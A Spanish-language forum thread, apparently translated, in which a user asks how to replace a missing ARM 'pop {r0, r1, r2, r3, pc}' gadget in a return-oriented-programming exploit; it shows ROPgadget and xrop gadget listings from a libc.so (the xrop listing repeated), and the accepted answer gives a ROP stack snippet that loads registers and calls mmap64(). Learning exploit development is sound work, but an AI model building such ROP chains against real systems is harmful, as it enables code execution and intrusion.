ROP Programación / Explotación en ARM - Cadena de gadgets

Question

ROP Programación / Explotación en ARM - Cadena de gadgets

#1 de dreamist (2 votos)

7

Lamentablemente, no puedo encontrar este gadget en mi libc.so. ¿Cómo podemos reprogramar esto usando diferentes instrucciones?

pop {r0, r1, r2, r3, pc}

¿Qué instrucciones lograrán lo mismo? ¿Qué gadgets tengo que buscar?

Se relaciona con este exploit

# pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

Gracias,

Actualización:

Estos gadgets están disponibles en mi libc.so:

¿Qué herramienta es mejor ROPgadget o xrop? xrop mostró definitivamente más gadgets

ROPgadget --binary libc.so --ropchain --only "pop"
Gadgets information
============================================================
0x0001061c : pop {r0, pc}
0x00042664 : pop {r1, pc}
0x00042d00 : pop {r3, pc}
0x0000f7dc : pop {r4, pc}
0x00041658 : pop {r4, r5, pc}
0x0004198c : pop {r4, r5, r6, pc}
0x00042c2c : pop {r4, r5, r6, r7, pc}

Y usando xrop:

Usage: xrop [-r arch] [-b bits] [-e bytes] [-l endian] [-a relocaddr] [-s regex] [-v] [-h] inputfile
     -b (16 | 32 | 64) sets the processor mode
     -r (arm | mips | powerpc | x86) raw binary file of given architecture
     -v displays the version number
     -l (b | e) big or little endian
     -e skips <bytes> of header
     -a rellocate at given address
     -n disable colors in the output
     -s filter gadgets with <regex>
     -h prints this menu

$ ./xrop -r arm -b 32 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

$ ./xrop -r arm -b 64 -l b  -s pop libc.so
> 0x19474               rsbmi   r4, r8, r8, ror #18
0x19478                 andsmi  r5, sl, #134217729  ; 0x8000001
0x1947c                 mvnpl   r0, #0, 4
0x19480                 popeq   {r3, r4, r5, r6, r7, ip, sp, pc}
_______________________________________________________________

> 0x230cc               mvnseq  r0, #-1073741814    ; 0xc000000a
0x230d0                 ldrdeq  pc, [sl], -r1   
0x230d4                 ldreq   r2, [r1, #2400]!    ; 0x960
0x230d8                 popcc   {r3, r4, r5, r6, r7, ip, lr}
_______________________________________________________________

> 0x2f1f0               rsbmi   r0, r1, #1073741848 ; 0x40000018
0x2f1f4                 popeq   {r0, r1, r2, r3, r4, r5, r7}
0x2f1f8                 teqeq   r3, r7, ror #10
0x2f1fc                 mrc2    10, 6, fp, cr12, cr8, {4}
_______________________________________________________________

> 0x3e520               ldrdls  r0, [r2, #-8]
0x3e524                 popcc   {r3, r6, r8, sl}
0x3e528                 eoreq   r7, r1, r4, asr #16
0x3e52c                 ldrbtle fp, [r7], #2296 ; 0x8f8
_______________________________________________________________

> 0x3e664               ldrdls  r0, [r2, #-8]
0x3e668                 popcc   {r3, r6, r8, sl}
0x3e66c                 eoreq   r7, r1, r4, asr #16
0x3e670                 ldrbtle r1, [r7], #1784 ; 0x6f8
_______________________________________________________________

> 0x40244               svcmi   0x00f0ff30
0x40248                 popeq   {r0, r2, r4, r5, r7, fp}
0x4024c                 ldrhteq r3, [r1], r9
_______________________________________________________________

> 1 + 0x1a84            movs    r2, r2
1 + 0x1a86              movs    r0, r1
1 + 0x1a88              asrs    r7, r7, #15
1 + 0x1a8a              movs    r0, r0
1 + 0x1a8c              pop {r0, r1, r2, r6, pc}
_______________________________________________________________

> 1 + 0xfb60            subs    r7, #192    ; 0xc0
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0xfb5e            tst.w   r5, #98304  ; 0x18000
1 + 0xfb62              adds    r0, #1
1 + 0xfb64              pop {r4, r5, r6, r7}
1 + 0xfb66              subs    r0, #1
1 + 0xfb68              strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x119e6           pop {r0, r1, r2, r3, r4, r5}
1 + 0x119e8             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11a46           pop {r0, r2, r4, r5, r7}
1 + 0x11a48             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x11c2e           pop {r2, r3, r4, r6, r7}
1 + 0x11c30             lsrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x12db0           pop {r0, r1, r3, r4, r5}
1 + 0x12db2             movs    r0, #0
1 + 0x12db4             strb    r7, [r0, #1]
_______________________________________________________________

> 1 + 0x21c72           subs    r0, r0, r4
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6e           cmp r3, #17
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x21c6c           vmov    d1, r2, r3
1 + 0x21c70             vmul.f64    d1, d1, d0
1 + 0x21c74             vpop    {d8}
1 + 0x21c78             vmov    r0, r1, d1
1 + 0x21c7c             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2db40           pop {r0, r3, r4, r5}
1 + 0x2db42             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc90           lsrs    r4, r2, #12
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x2dc8e           vmov    d4, r0, r1
1 + 0x2dc92             vpop    {d8-d9}
1 + 0x2dc96             vadd.f64    d5, d3, d4
1 + 0x2dc9a             vmovlt  r0, r1, d5
1 + 0x2dc9e             asrs    r5, r7, #2
_______________________________________________________________

> 1 + 0x4ea9a           cbnz    r0, 0x4eacc
1 + 0x4ea9c             cbnz    r2, 0x4eb0e
1 + 0x4ea9e             pop {r0, r2, r3, r4, r5, r7}
_______________________________________________________________

> 1 + 0x5954c           movs    r0, r0
1 + 0x5954e             movs    r0, r1
1 + 0x59550             movs    r1, r3
1 + 0x59552             movs    r0, r0
1 + 0x59554             pop {r0, r1, r2, r6}
_______________________________________________________________

> 1 + 0x6b1cc           movs    r2, r2
1 + 0x6b1ce             movs    r0, r1
1 + 0x6b1d0             ldrsh   r3, [r7, r4]
1 + 0x6b1d2             movs    r0, r0
1 + 0x6b1d4             pop {r0, r1, r2, r6, pc}
_______________________________________________________________

exploit arm assembly exploit-development

pregunta android_dev 28.09.2015 - 21:26

fuente

1 respuesta

Lea otras preguntas en las etiquetas exploit arm assembly exploit-development

¿concesión de contraseña sin secreto de cliente? Si dos programas en la misma máquina se comunican a través de TCP, ¿pueden verse desde afuera?

score 2 · Accepted Answer

No eché un vistazo largo, pero utilizando el resultado 1 + 0x59554 : pop {r0, r1, r2, r6} de xrop y el resultado 0x00042d00 : pop {r3, pc} de ROPgadget, ¿has intentado colocar esto en tu pila de ROP?

page += p32(pop_r0_r1_r2_r6_pc) #xrop result with loaded offset
page += p32(r0_popval)  #r0 - mmap() address in exploit.
page += p32(r1_popval)  #r1 - size in exploit.
page += p32(r2_popval)  #r2 - protection in exploit.
page += p32(r6_popval)  #r6 - 0x66666666 looks just like recognizable junk.
page += p32(pop_r3_pc)  #ROPgadget result with loaded offset
page += p32(r3_popval)  #r3 - flags for mmap in exploit.
page += p32(mmap64_address)     #for popping into pc to call mmap64().

Me imagino que haría bien si son gadgets válidos. Considera también buscar gadgets Thumb si tienes gadgets decentes para bifurcar e intercambiar entre modos.

He estado aprendiendo material similar, para el cual ROPgadget ha estado bien, pero sugeriría usar la que tenga más funciones listas para hacer lo que necesita hacer más rápido. Me encantaría, por ejemplo, la generación automatizada de cadenas ARM en ROPgadget, pero no es una función.